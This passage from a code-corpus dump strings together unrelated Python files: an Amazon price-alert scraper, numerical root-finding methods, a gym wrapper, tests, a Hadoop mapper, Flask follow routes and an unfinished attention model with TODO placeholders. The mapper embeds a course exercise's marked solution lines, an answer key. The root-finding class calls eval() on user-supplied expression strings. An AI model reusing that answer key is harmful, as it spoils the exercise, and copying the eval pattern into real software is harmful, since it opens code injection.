<= self.budget:\n return True\n else:\n return False\n\n #Runs the scraper\n def run(self):\n self.get_title()\n self.get_price()\n self.alert = self.is_below_budget()\n self.status = False\n if self.alert:\n self.status = self.send_email()\n return self.status\n\n #Sends an email when the condition is satisfied. 
Under testing!\n    def send_email(self):\n\n        #Attributes for email sending\n        port = 587\n        smtp_server = 'smtp.gmail.com'\n        self.email = str(os.environ.get('DEVELOPER_MAIL'))\n        self.app_pw = str(os.environ.get('DEVELOPER_PASS'))\n\n        #Message details\n        subject = f'The price of {self.get_title()} is within your budget!'\n\n        body_start = 'Hey there!\\n\\nThe price is now within your budget. Here is the link, buy it now!\\n'\n        body_mid = self.url\n        body_end = '\\n\\nRegards\\nYour friendly neighbourhood programmer'\n        body = str(body_start) + str(body_mid) + str(body_end)\n\n        message = f\"Subject: {subject}\\n\\n{body}\"\n\n        context = ssl.create_default_context()\n        with smtplib.SMTP(smtp_server, port) as server:\n            server.ehlo() # Can be omitted\n            server.starttls(context=context)\n            server.ehlo() # Can be omitted\n            server.login(self.email, self.app_pw)\n            server.sendmail(self.email, self.u_email, message)\n            print(\"Email sent successfully!\")\n            # the with-block closes the SMTP connection on exit\n        return True\n\n\ndef main():\n    url = input(\"Paste the link of the Amazon product whose price you wish to monitor:\")\n    budget = int(input(\"Enter your budget price:\"))\n    u_email = input(\"Enter your email:\")\n    inp_str = (\"How frequently would you like to receive updates?\"\n               \"\\n1.Every hour\\n2.Every 3 hours\\n3.Every 6 hours\"\n               \"\\nEnter your choice (Default choice is 6 hours):\")\n    time_choice = int(input(inp_str))\n    if time_choice == 1:\n        time_delay = 60 * 60\n    elif time_choice == 2:\n        time_delay = 3 * 60 * 60\n    else:\n        time_delay = 6 * 60 * 60\n    msg = (\"Great! Now just sit back and relax. Minimize this program and be sure \"\n           \"that it is running.\\nAdditionally, ensure that there is stable internet connection \"\n           \"during the time this program runs.\\nIf the price of the product falls within your budget, \"\n           \"you will receive an email regarding the same and this program will auto-close.\\nThank you for using \"\n           \"Amazon-Shopping-Bot's scraper!\")\n    print(msg)\n    shopbot = Scraper(url,budget,u_email)\n    while True:\n        if shopbot.run():\n            break\n        time.sleep(time_delay)\n\nif __name__ == '__main__':\n    main()\n","sub_path":"amazon_scraper.py","file_name":"amazon_scraper.py","file_ext":"py","file_size_in_byte":5424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"552037416","text":"from sympy import *\nfrom decimal import Decimal\nclass Methods:\n\n    def __init__(self, function, gunction=''):\n        self.func = function\n        if gunction:\n            self.gunction = gunction\n\n    def f(self, number):\n        init_printing(use_unicode=True)\n        x = symbols('x')\n        fx = eval(self.func)\n        function = fx.evalf(subs={x: number})\n        dfx = Derivative(fx, x).doit()\n        derivative = dfx.evalf(subs={x: number})\n        dfx2 = Derivative(dfx, x).doit()\n        derivative2 = dfx2.evalf(subs={x: number})\n        return (function, derivative, derivative2)\n\n    def g(self, number):\n        x = symbols('x')\n        gx = eval(self.gunction)\n        # evaluate g at the given point, as f() does above\n        return gx.evalf(subs={x: number})\n\n    def bisection(self, xi, xs, tolerance, iterations):\n        # table = PrettyTable(['Iteration', 'Xinf', 'Xsup', 'Xmi', 'f(Xmi)', 'Error'])\n        fxi = self.f(xi)[0]\n        fxs = self.f(xs)[0]\n        root = 0\n        rows = [['Iteration', 'Xinf', 'Xsup', 'Xmi', 'f(Xmi)', 'Error']]\n        if fxi == 0:\n            root = xi\n        elif fxs == 0:\n            root = xs\n        elif fxi * fxs < 0:\n            xm = (xi + xs) / 2\n            fxm = self.f(xm)[0]\n            cont = 1\n            error = tolerance + 1\n            row = [cont, xi, xs, xm, fxm, 'Doesnt exist']\n            # table.add_row(row)\n            rows.append(row)\n            while error > tolerance and fxm != 0 and cont < iterations:\n                if fxi * fxm < 0:\n                    xs = xm\n                    fxs = fxm\n                
else:\n xi = xm\n fxi = fxm\n aux = xm\n xm = (xi + xs) / 2\n fxm = self.f(xm)[0]\n error = abs(xm - aux)\n cont += 1\n row = [cont, xi, xs, xm, fxm, '%.2E' % Decimal(str(error))]\n # table.add_row(row)\n rows.append(row)\n if fxm == 0:\n root = xm\n elif error < tolerance:\n root = (xm, '%.2E' % Decimal(str(error)))\n else:\n root = (None, iterations)\n # print(table)\n else:\n root = None\n return (root, rows)\n\n def falseRule(self, xi, xs, tolerance, iterations):\n # table = PrettyTable(['Iteration', 'Xinf', 'Xsup', 'Xmi', 'f(Xmi)', 'Error'])\n fxi = self.f(xi)[0]\n fxs = self.f(xs)[0]\n si = xi - xs\n helper = fxi - fxs\n root = 0\n rows = [['Iteration', 'Xinf', 'Xsup', 'Xmi', 'f(Xmi)', 'Error']]\n if fxi == 0:\n root = xi\n elif fxs == 0:\n root = xs\n elif fxi * fxs < 0:\n if helper != 0:\n xm = xi - ((fxi * si) / helper)\n fxm = self.f(xm)[0]\n cont = 1\n error = tolerance + 1\n # table.add_row([cont, xi, xs, xm, fxm, 'Doesnt exist'])\n rows.append([cont, xi, xs, xm, fxm, 'Doesnt exist'])\n while error > tolerance and fxm != 0 and cont < iterations:\n if fxi * fxm < 0:\n xs = xm\n fxs = fxm\n else:\n xi = xm\n fxi = fxm\n aux = xm\n si = xi - xs\n helper = fxi - fxs\n if helper == 0:\n break\n xm = xi - ((fxi * si) / helper)\n fxm = self.f(xm)[0]\n error = abs(xm - aux)\n cont += 1\n rows.append([cont, xi, xs, xm, fxm, '%.2E' % Decimal(str(error))])\n if fxm == 0:\n root = xm\n elif error < tolerance:\n root = (xm, '%.2E' % Decimal(str(error)))\n else:\n root = (None, iterations)\n print(rows)\n else:\n root = False\n else:\n root = None\n return (root, rows)\n\n def fixedPoint(self, xa, tolerance, iterations):\n table = [['Iteration', 'Xn', 'f(Xn)', 'Error']]\n fx = self.f(xa)[0]\n cont = 0\n error = tolerance + 1\n table.append([cont, xa, fx, 'Doesnt exist'])\n while fx != 0 and error > tolerance and cont < iterations:\n xn = self.g(xa)\n fx = self.f(xn)[0]\n error = abs(xn - xa)\n xa = xn\n cont += 1\n table.append([cont, xn, fx, '%.2E' % Decimal(str(error))])\n if fx == 0:\n root = xa\n elif error < tolerance:\n root = (xa, '%.2E' % Decimal(str(error)))\n else:\n root = (None, iterations)\n print(table)\n return (root, table)\n\n def incremental_searches(self, x0, delta, iterations):\n fx = self.f(x0)[0]\n root = 0\n roots = [['Roots']]\n if fx == 0:\n root = x0\n roots.append(x0)\n else:\n x1 = x0 + delta\n cont = 1\n fx1 = self.f(x1)[0]\n while cont < iterations:\n if fx1 == 0:\n root = x1\n roots.append(x1)\n elif fx * fx1 < 0:\n root = (x0, x1)\n roots.append(root)\n else:\n root = None\n x0 = x1\n fx = fx1\n x1 = x0 + delta\n fx1 = self.f(x1)[0]\n cont += 1\n return roots\n\n def multipleRoots(self, x0, tolerance, iterations):\n table = [['Iteration', 'Xn', 'f(Xn)', 'df(Xn)', 'd(2)f(Xn)', 'Error']]\n fx = self.f(x0)[0]\n dfx = self.f(x0)[1]\n dfx2 = self.f(x0)[2]\n cont = 0\n error = tolerance + 1\n table.append([cont, x0, '%.2E' % Decimal(str(fx)), '%.2E' % Decimal(str(dfx)), '%.2E' % Decimal(str(dfx2)),\n 'Doesnt exist'])\n while error > tolerance and fx != 0 and dfx != 0 and cont < iterations:\n numerator = fx * dfx\n denominator = (dfx ** 2) - (fx * dfx2)\n x1 = x0 - (numerator / denominator)\n fx = self.f(x1)[0]\n dfx = self.f(x1)[1]\n dfx2 = self.f(x1)[2]\n error = abs(x1 - x0)\n x0 = x1\n cont += 1\n table.append([cont, x1, '%.2E' % Decimal(str(fx)), '%.2E' % Decimal(str(dfx)), '%.2E' % Decimal(str(dfx2)),\n '%.2E' % Decimal(str(error))])\n\n if fx == 0:\n root = x0\n elif error < tolerance:\n root = (x1, '%.2E' % Decimal(str(error)))\n elif dfx == 0 and fx == 0 and 
dfx2 != 0:\n            root = x1\n        else:\n            root = None\n        print(table)\n        return (root, table)\n\n    def aitken(self, x0, tolerance, iterations):\n        table = [['Iteration', 'Xn', 'Error Absoluto']]\n        fx0 = self.f(x0)[0]\n        root = 0\n        if fx0 == 0:\n            root = x0\n        else:\n            cont = 0\n            error = tolerance + 1\n            table.append([cont, x0, 'Doesnt exist'])\n            prev = x0\n\n            while cont < iterations and error > tolerance:\n                x1 = self.f(x0)[0]\n                x2 = self.f(x1)[0]\n\n                if (x2 - x1) - (x1 - x0) == 0:\n                    break\n                aux = x2 - (((x2 - x1) ** 2) / ((x2 - x1) - (x1 - x0)))\n                if aux == 0:\n                    break\n                error = abs((aux - prev))  # absolute error\n                cont += 1\n                table.append([cont, aux, '%.2E' % Decimal(str(error))])\n                x0 = x1\n                prev = aux\n\n            if error < tolerance:\n                root = (aux, '%.2E' % Decimal(str(error)))\n            else:\n                root = (None, cont)\n\n        print(table)\n        return (root, table)\n\n    def bis(self, a, b):\n        fa = self.f(a)[0]\n        x = (a + b) / 2.0\n        fx = self.f(x)[0]\n        if (fa * fx) < 0:\n            b = x\n        else:\n            a = x\n        x = (a + b) / 2.0\n        return a, b, x\n\n    def aitken_bis(self, a, b, tolerance, iterations):\n        table = [['Iteration', 'Xn', 'Error Absoluto']]\n        x0 = (a + b) / 2.0\n        fa = self.f(a)[0]\n        fb = self.f(b)[0]\n        fx0 = self.f(x0)[0]\n        root = 0\n        if fx0 == 0:\n            root = x0\n        elif fa == 0:\n            root = a\n        elif fb == 0:\n            root = b\n        else:\n            cont = 0\n            error = tolerance + 1\n            table.append([cont, x0, 'Doesnt exist'])\n            prev = x0\n\n            while cont < iterations and (error > tolerance or error == 0):\n                a1, b1, x1 = self.bis(a, b)\n                a2, b2, x2 = self.bis(a1, b1)\n                den = (x2 - x1) - (x1 - x0)\n                if den == 0:\n                    print(\"The denominator became 0.\")\n                    break\n                xn = x2 - (((x2 - x1) ** 2) / den)\n                if xn == prev:\n                    a, b, x0 = a1, b1, x1\n                    prev = xn\n                    continue\n                error = abs(xn - prev)  # absolute error\n                cont += 1\n                table.append([cont, xn, '%.2E' % Decimal(str(error))])\n                a, b, x0 = a1, b1, x1\n                prev = xn\n\n            if error < tolerance:\n                root = (xn, '%.2E' % Decimal(str(error)))\n            else:\n                print (error)\n                root = (None, cont)\n\n        print(table)\n        return (root, table)\n\n    def muller(self, x0, x1, tolerance, iterations):\n        table = [['Iteration', 'X1', 'X2', 'X3', 'Error Absoluto']]\n        x2 = (x0 + x1) / 2.0  # We get the third value using bisection (midpoint of x0 and x1)\n        fx0 = self.f(x0)[0]\n        fx1 = self.f(x1)[0]\n        fx2 = self.f(x2)[0]\n        root = 0\n        if fx0 == 0:\n            root = x0\n        elif fx1 == 0:\n            root = x1\n        elif fx2 == 0:\n            root = x2\n        else:\n            cont = 0\n            error = tolerance + 1\n            table.append([cont, x0, x1, x2, 'Doesnt exist'])\n\n            while cont < iterations and error > tolerance:\n                h0 = x1 - x0\n                h1 = x2 - x1\n                if (h0 == 0) | (h1 == 0):\n                    print (\"h0 or h1 became 0.\")\n                    break\n                delta0 = (fx1 - fx0) / h0\n                delta1 = (fx2 - fx1) / h1\n                if h1 - h0 == 0:\n                    print (\"h1 - h0 became 0.\")\n                    break\n                a = (delta1 - delta0) / (h1 - h0)\n                b = a * h1 + delta1\n                c = fx2\n                # Solving the quadratic equation\n                den = 1\n                if b < 0:\n                    den = b - sqrt(b ** 2 - 4 * a * c)\n                else:\n                    den = b + sqrt(b ** 2 - 4 * a * c)\n                x3 = x2 + (-2 * c) / den\n\n                error = abs(x3 - x2)  # Abs error\n                cont += 1\n                table.append([cont, x1, x2, x3, '%.2E' % Decimal(str(error))])\n                x0 = x1\n                x1 = x2\n                x2 = x3\n                fx0 = fx1\n                fx1 = fx2\n                fx2 = self.f(x3)[0]\n\n            if error < tolerance:\n                root = (x3, '%.2E' % Decimal(str(error)))\n            else:\n                if (cont == iterations):\n                    print (\"The method failed.\")\n                    root = (None, cont)\n                else:\n                    root = (x3, '%.2E' % Decimal(str(error)))\n\n        print(table)\n        return (root, 
table)\n","sub_path":"Project/methods.py","file_name":"methods.py","file_ext":"py","file_size_in_byte":11621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"11476841","text":"\"\"\"An environment wrapper to convert binary to discrete action space.\"\"\"\n\"\"\"An environment wrapper to convert binary to discrete action space.\"\"\"\nimport gym\nfrom gym import Env\nfrom gym import Wrapper\n\nclass JoypadSpace(Wrapper):\n \"\"\"An environment wrapper to convert binary to discrete action space.\"\"\"\n\n # a mapping of buttons to binary values\n # _button_map = {\n # 'right': 0b10000000,\n # 'left': 0b01000000,\n # 'down': 0b00100000,\n # 'up': 0b00010000,\n # 'start': 0b00001000,\n # 'select': 0b00000100,\n # 'B': 0b00000010,\n # 'A': 0b00000001,\n # 'noop': 0b00000000,\n # }\n\n _button_list = ['B', 'noop', 'select', 'start', 'up', 'down', 'left', 'right', 'A']\n\n @classmethod\n def buttons(cls) -> list:\n \"\"\"Return the buttons that can be used as actions.\"\"\"\n return list(cls._button_map.keys())\n\n def __init__(self, env: Env, actions: list):\n \"\"\"\n Initialize a new binary to discrete action space wrapper.\n\n Args:\n env: the environment to wrap\n actions: an ordered list of actions (as lists of buttons).\n The index of each button list is its discrete coded value\n\n Returns:\n None\n\n \"\"\" \n super().__init__(env)\n assert isinstance(env.action_space, gym.spaces.MultiBinary)\n\n self.action_space = gym.spaces.Discrete(len(actions))\n # create the action map from the list of discrete actions\n self._action_map = {}\n self._action_meanings = {}\n # iterate over all the actions (as button lists)\n buttons = self._button_list #list(self._button_map.keys())\n for action, button_list in enumerate(actions):\n # the value of this action's bitmap\n arr = [0] * env.action_space.n #np.array([False] * env.action_space.n)\n # iterate over the buttons in this button list\n for button in button_list:\n arr[buttons.index(button)] = 1\n # byte_action |= self._button_map[button]\n # set this action maps value to the byte action value\n self._action_map[action] = arr\n self._action_meanings[action] = ' '.join(button_list)\n\n def step(self, action):\n \"\"\"\n Take a step using the given action.\n\n Args:\n action (int): the discrete action to perform\n\n Returns:\n a tuple of:\n - (numpy.ndarray) the state as a result of the action\n - (float) the reward achieved by taking the action\n - (bool) a flag denoting whether the episode has ended\n - (dict) a dictionary of extra information\n\n \"\"\"\n # take the step and record the output\n return self.env.step(self._action_map[action])\n\n def reset(self):\n \"\"\"Reset the environment and return the initial observation.\"\"\"\n return self.env.reset()\n\n def get_action_meanings(self):\n \"\"\"Return a list of actions meanings.\"\"\"\n actions = sorted(self._action_meanings.keys())\n return [self._action_meanings[action] for action in actions]\n\n\n\"\"\"Static action sets for binary to discrete action space wrappers.\"\"\"\n# actions for the simple run right environment\nRIGHT_ONLY = [\n ['noop'],\n ['right'],\n ['right', 'A'],\n ['right', 'B'],\n ['right', 'A', 'B'],\n]\n\n\n# actions for very simple movement\nSIMPLE_MOVEMENT = [\n ['noop'],\n ['right'],\n ['right', 'A'],\n ['right', 'B'],\n ['right', 'A', 'B'],\n ['A'],\n ['left'],\n]\n\n\n# actions for more complex movement\nCOMPLEX_MOVEMENT = [\n ['noop'],\n ['right'],\n ['right', 'A'],\n ['right', 'B'],\n ['right', 'A', 'B'],\n 
['A'],\n    ['left'],\n    ['left', 'A'],\n    ['left', 'B'],\n    ['left', 'A', 'B'],\n    ['down'],\n    ['up'],\n]\n","sub_path":"gradius/PPO/src/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":3847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"208596802","text":"# -*- coding: utf-8 -*-\n\"\"\"Tests for annotation type hint casting.\"\"\"\n\nfrom __future__ import unicode_literals\n\nimport os.path\nimport types\nimport uuid\n\nimport pytest\nimport six\n\nfrom typingplus import Any\nimport typingplus.types as tp\n\n\ndef test_bounded_type():\n    \"\"\"Test the bounded type object.\"\"\"\n    with pytest.raises(TypeError):\n        BoundedInt = tp.Bounded[int]\n    with pytest.raises(TypeError):\n        BoundedInt = tp.Bounded[int, 10:20, lambda x: x, None]\n    BoundedInt = tp.Bounded[int, 10:20]\n    with pytest.raises(ValueError):\n        BoundedInt(5)\n    assert BoundedInt(10) == 10\n    assert BoundedInt(15) == 15\n    assert BoundedInt(20) == 20\n    with pytest.raises(ValueError):\n        BoundedInt(25)\n    BoundedStr = tp.Bounded[str, 1:5, len]\n    with pytest.raises(ValueError):\n        BoundedStr('')\n    assert BoundedStr('abc') == 'abc'\n    with pytest.raises(ValueError):\n        BoundedStr('abcdef')\n    assert str(BoundedInt) == 'typingplus.types.Bounded[int, 10:20]'\n    assert tp.Bounded[Any, 10:20](15) == 15\n    assert tp.Bounded['int', 20](15) == 15\n    assert tp.Bounded['int', 10:](15) == 15\n\n\ndef test_length_type():\n    \"\"\"Test the bounded length type object.\"\"\"\n    with pytest.raises(TypeError):\n        LengthBoundedStr = tp.Length[str]\n    with pytest.raises(TypeError):\n        LengthBoundedStr = tp.Length[str, 10:20, lambda x: x]\n    LengthBoundedStr = tp.Length[str, 1:5]\n    with pytest.raises(ValueError):\n        LengthBoundedStr('')\n    assert LengthBoundedStr('a') == 'a'\n    assert LengthBoundedStr('abcde') == 'abcde'\n    with pytest.raises(ValueError):\n        LengthBoundedStr('abcdef')\n    LengthBoundedList = tp.Length[list, 1:1]\n    with pytest.raises(ValueError):\n        LengthBoundedList([])\n    assert LengthBoundedList([1]) == [1]\n    with pytest.raises(ValueError):\n        LengthBoundedList([1, 2])\n    assert str(LengthBoundedStr) == 'typingplus.types.Length[str, 1:5]'\n    assert tp.Length[Any, 1:5]('abc') == 'abc'\n    assert tp.Length['str', 20]('abc') == 'abc'\n\n\ndef test_validation_type():\n    \"\"\"Test that the validation type validates content.\"\"\"\n    ValidFile = tp.Valid[os.path.isfile]\n    assert ValidFile(__file__) == __file__\n    with pytest.raises(TypeError):\n        tp.Valid[int, int, int]\n\n\ndef test_path_types(request):\n    \"\"\"Test that the supplied path validation types work.\"\"\"\n    assert tp.File(__file__) == __file__\n    with pytest.raises(ValueError):\n        tp.File(str(uuid.uuid4()))\n    assert tp.Dir(os.path.dirname(__file__)) == os.path.dirname(__file__)\n    with pytest.raises(ValueError):\n        tp.Dir(str(uuid.uuid4()))\n    assert tp.ExistingPath(__file__) == __file__\n    assert tp.ExistingPath(os.path.dirname(__file__)) == os.path.dirname(\n        __file__)\n    with pytest.raises(ValueError):\n        tp.ExistingPath(str(uuid.uuid4()))\n    try:\n        home = os.environ['HOME']\n\n        def _reset_home():\n            os.environ['HOME'] = home\n\n        request.addfinalizer(_reset_home)\n    except KeyError:\n        pass\n    os.environ['HOME'] = '/home/bob'\n    assert tp.Path('~/test') == '/home/bob/test'\n\n\ndef test_none_type():\n    \"\"\"Verify that NoneType is type(None).\"\"\"\n    assert tp.NoneType is type(None)\n\n\ndef test_singleton():\n    \"\"\"Test that a singleton only allows a single instance of a class.\"\"\"\n    @six.add_metaclass(tp.Singleton)\n    class TestClass(object):\n        
pass\n\n assert TestClass() is TestClass()\n\n\ndef test_uninstantiable():\n \"\"\"Test that an uninstantiable class cannot be instantiated.\"\"\"\n @six.add_metaclass(tp.Uninstantiable)\n class TestClass(object):\n pass\n\n with pytest.raises(TypeError):\n TestClass()\n","sub_path":"tests/test_types.py","file_name":"test_types.py","file_ext":"py","file_size_in_byte":3676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"503576856","text":"#!/usr/bin/env python\n\"\"\"\nMapper partitions based on first letter in word.\nINPUT:\n word \\t count\nOUTPUT:\n partitionKey \\t word \\t count \n\"\"\"\nimport re\nimport sys\n \ndef getPartitionKey(word,count):\n \"\"\" \n Helper function to assign partition key ('A', 'B', or 'C').\n Args: word (str) ; count (int)\n \"\"\"\n ############ YOUR CODE HERE ##########\n if count > 8: # <--- SOLUTION --->\n return 'B' # <--- SOLUTION --->\n elif count > 4: # <--- SOLUTION --->\n return 'C' # <--- SOLUTION --->\n else: # <--- SOLUTION --->\n return 'A' # <--- SOLUTION --->\n \n # provided implementation: (run this first, then make your changes in part e)\n if word[0] < 'h': \n return 'A'\n elif word[0] < 'p':\n return 'B'\n else:\n return 'C'\n ############ (END) YOUR CODE #########\n \n# read from standard input\nfor line in sys.stdin: \n word, count = line.strip().split()\n count = int(count)\n partitionKey = getPartitionKey(word, count) \n print(f\"{partitionKey}\\t{word}\\t{count}\")","sub_path":"LiveSessionMaterials/wk03Demo_HadoopShuffle/master/PartitionSort/mapper.py","file_name":"mapper.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"108328851","text":"# OOP for collecting songs in a list.\n# Each question will categorize the song in a list of rock or country\n\n# The two lists which will be used for placing the songs\nrock = []\ncountry = []\n\n\n# Defining the function\ndef collect_songs():\n song = \"Enter a song.\"\n ask = \"Type r or c. q to quit\"\n\n # While True will be used to keep the loop going of adding\n while True:\n genre = input(ask)\n if genre == \"q\":\n print(\"The program has been terminated.\")\n break\n\n if genre == \"r\":\n # If the request is to add a rock song the next line will be executed.\n rk = input(song)\n # With the next line the song will be added to the rock list. Hence the append function.\n rock.append(rk)\n\n elif genre == \"c\":\n cy = input(song)\n country.append(cy)\n\n else:\n print(\"Invalid input, please choose between r or c. Press q and confirm with enter to quit.\")\n\n print(rock)\n print(country)\n\n\ncollect_songs()\n","sub_path":"part_ii_intro_to_oop/collect_songs.py","file_name":"collect_songs.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"254808381","text":"import numpy as np\nimport torch\nfrom .base_model import BaseModel\nfrom . 
import networks\nfrom .patchnce import PatchNCELoss\nimport util.util as util\n\n\nclass AttentionModel(BaseModel):\n    @staticmethod\n    def modify_commandline_options(parser, is_train=True):\n        # set defaults\n        parser.set_defaults(TODO)\n        if is_train:\n            parser.add_argument(TODO)\n            parser.set_defaults(gan_mode=\"lsgan\")\n        return parser\n\n    def __init__(self, opt):\n        BaseModel.__init__(self, opt)\n        self.loss_names = ['D']\n        self.visual_names = ['input', 'output']\n        self.model_names = ['D']\n        # self.netD = networks.define_D(opt.output_nc, opt.ndf, opt.netD, opt.n_layers_D, opt.normD, opt.init_type, opt.init_gain, opt.no_antialias, self.gpu_ids, opt)\n        self.netD = networks.define_G(opt.input_nc, opt.output_nc, opt.ngf, opt.netG, opt.normG, not opt.no_dropout,\n                                      opt.init_type, opt.init_gain, opt.no_antialias, opt.no_antialias_up, self.gpu_ids,\n                                      opt)\n        self.layers = [2, 6, 10, 14]\n        if self.isTrain:\n            self.criterionLoss = networks.GANLoss(opt.gan_mode).to(self.device)\n            self.optimizer_D = torch.optim.Adam(self.netD.parameters(), lr=opt.lr, betas=(opt.beta1, opt.beta2))\n            self.optimizers = [self.optimizer_D]\n\n        # Our program will automatically call <BaseModel.setup> to define schedulers, load networks, and print networks\n\n    def set_input(self, input):\n        \"\"\"Unpack input data from the dataloader and perform necessary pre-processing steps.\n\n        Parameters:\n            input: a dictionary that contains the data itself and its metadata information.\n        \"\"\"\n        self.input_imgs = input[0]\n        self.image_classes = input[1]\n\n    def forward(self):\n        \"\"\"Run forward pass. This will be called by both functions <optimize_parameters> and <test>.\"\"\"\n        self.output = self.netD(self.input_imgs) # generate output image given the input data_A\n\n    def optimize_parameters(self):\n        \"\"\"Update network weights; it will be called in every training iteration.\"\"\"\n        self.forward() # first call forward to calculate intermediate results\n        self.optimizer_D.zero_grad() # clear network G's existing gradient\n\n        self.loss_D = 0\n        for i in range(self.opt.batch_size):\n            self.loss_D += self.criterionLoss(self.output[i], self.image_classes[i]).mean()\n        self.loss_D /= self.opt.batch_size\n        self.loss_D.backward()\n        self.optimizer_D.step() # update gradients for network G\n\n    def generate_attention(self):\n        \"Return list of channel-wise squared mean feature maps\"\n        # feat_maps = self.netD.attention_forward(self.input_imgs, self.layers)\n        feat_maps = self.netD(self.input_imgs, self.layers, encode_only=True)\n        for i in range(len(feat_maps)):\n            print(feat_maps[i].shape)\n            feat_maps[i] = feat_maps[i].pow(2).mean(1)\n\n        for feat in feat_maps:\n            print(feat.shape)\n        return feat_maps\n","sub_path":"models/attention_model.py","file_name":"attention_model.py","file_ext":"py","file_size_in_byte":3141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"514296113","text":"import card\nimport random\n\n\nclass Deck:\n    def __init__(self):\n        self.__cards = []\n        for suit in card.suits:\n            for rank in card.ranks:\n                new_card = card.Card(suit, rank)\n                self.__cards.append(new_card)\n\n    @staticmethod\n    def _get_shuffle_index(card_index):\n        while True:\n            shuffle_index = random.randint(0, 51)\n            if shuffle_index != card_index:\n                return shuffle_index\n\n    def shuffle(self):\n        for card_one_index in range(0, 52): # between 0 to 51 inclusive\n            card_two_index = Deck._get_shuffle_index(card_one_index)\n            card_one = self.__cards[card_one_index] # hold card_one reference\n            card_two = self.__cards[card_two_index] # hold card_two reference\n            self.__cards.remove(card_one)\n            self.__cards.remove(card_two)\n            self.__cards.insert(card_one_index, card_two)\n            self.__cards.insert(card_two_index, card_one)\n\n    def deal(self, num_of_cards):\n        if num_of_cards <= 0:\n            raise AssertionError # num_of_cards cannot be negative or zero\n        result = []\n        while num_of_cards > 0:\n            result.append(self.__cards.pop()) # deal a card into result list, can raise IndexError if deck is empty\n            num_of_cards -= 1\n        return result\n\n    def _print(self):\n        print('The deck is:')\n        for card in self.__cards:\n            print(card)\n\n\n\n\n","sub_path":"08-Milestone Project-2/BlackJackV1/deck.py","file_name":"deck.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"302843136","text":"from flask import Blueprint, request, jsonify\nfrom sqlalchemy.orm import joinedload\nfrom ..models import User, Follow, db\n\n\n# following = /:id/following\n# follows = /:id\n\nfollow_routes = Blueprint(\"follow\", __name__)\n\n# users who follow user of <id>\n@follow_routes.route('/<id>')\ndef getFollows(id):\n    follows = Follow.query.filter(Follow.user_followed_id == id).all()\n\n    followsList = []\n    for follower in follows:\n        user = User.query.filter(follower.user_id == User.id).first()\n        followsList.append(user.to_dict())\n    return {\"users\": followsList}\n\n@follow_routes.route('/<id>/following')\ndef getFollowing(id):\n    follows = Follow.query.filter(Follow.user_id == id).all()\n\n    followsList = []\n    for follower in follows:\n        user = User.query.filter(follower.user_followed_id == User.id).first()\n        followsList.append(user.to_dict())\n    return {\"users\": followsList}\n\n@follow_routes.route('', methods=[\"POST\"])\ndef followUser():\n    data = request.json\n    exists = Follow.query.filter(Follow.user_id == data['userId']).filter(Follow.user_followed_id == data['userFollowedId']).first()\n    if exists:\n        return {\"error\": \"Already Follow!\"}\n    follow = Follow(user_id = data['userId'], user_followed_id = data['userFollowedId'])\n    db.session.add(follow)\n    db.session.commit()\n    return follow.to_dict()\n\n@follow_routes.route('', methods = [\"DELETE\"])\ndef deleteFollow():\n    data = request.json\n    print(data)\n    exists = Follow.query.filter(Follow.user_id == data['userId']).filter(Follow.user_followed_id == data['userFollowedId']).first()\n    print(exists.to_dict())\n    if not exists:\n        return {\"error\": \"Doesn't follow!\"}\n    follow = Follow.query.filter(Follow.user_id == data['userId']).filter(Follow.user_followed_id == data['userFollowedId']).first()\n    db.session.delete(follow)\n    db.session.commit()\n    return follow.to_dict()\n","sub_path":"app/api/follow_routes.py","file_name":"follow_routes.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"208628699","text":"# -*- coding: utf-8 -*-\nimport tensorflow as tf\nimport numpy as np\nimport random\nimport argparse\nimport os\nimport pickle\nimport json\nfrom imblearn.over_sampling import RandomOverSampler\nfrom sklearn import svm\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.decomposition import PCA\nfrom sklearn.metrics.pairwise import pairwise_distances\n\nclass Bunch(object):\n    def __init__(self, adict):\n        self.__dict__.update(adict)\n\n\ndef extract_args_from_json(config_file, args_dict):\n    with open(config_file) as f:\n        summary_dict = json.load(fp=f)\n\n    for key in summary_dict.keys():\n        args_dict[key] = summary_dict[key]\n\n    return 
args_dict\n\n\ndef load_MiniImageNet():\n\n    \"\"\" load the MiniImageNet tasks.\n\n    Returns\n    -------\n    test_tasks : list\n        meta-testing tasks.\n\n    \"\"\"\n\n    base_path = '/home/USER/Documents'\n    if (not (os.path.exists(base_path))):\n        base_path = '/home/ubuntu/Projects'\n    if (not (os.path.exists(base_path))):\n        base_path = '/home/USER/Projects'\n    if (not (os.path.exists(base_path))):\n        base_path = '/home/USER/Projects'\n\n    data_path = base_path + '/MAML/input_data/miniImageNet/'\n\n    test_tasks_file = open(data_path + 'miniImageNet_test_tasks.txt', 'rb')\n    test_tasks = pickle.load(test_tasks_file)\n\n    return test_tasks\n\n\n\ndef initialize_ocsvm(kernel, nu, gamma, **kwargs):\n\n    if kernel in ('linear', 'poly', 'rbf', 'sigmoid'):\n        kernel = kernel\n    else:\n        kernel = 'precomputed'\n\n    ocsvm = svm.OneClassSVM(kernel=kernel, nu=nu, gamma=gamma, **kwargs)\n    return ocsvm\n\n\ndef train(ocsvm, X_train, X_test, Y_test, kernel, nu, GridSearch=True, **kwargs):\n\n    if X_train.ndim > 2:\n        X_train_shape = X_train.shape\n        X_train = X_train.reshape(X_train_shape[0], np.prod(X_train_shape[1:]))\n    else:\n        X_train = X_train\n\n    if kernel in ('DegreeKernel', 'WeightedDegreeKernel'):\n        # get_kernel_matrix(kernel=kernel, X_train=X_train, **kwargs)\n        # svm.fit(K_train)\n        print('unexpected behaviour')\n    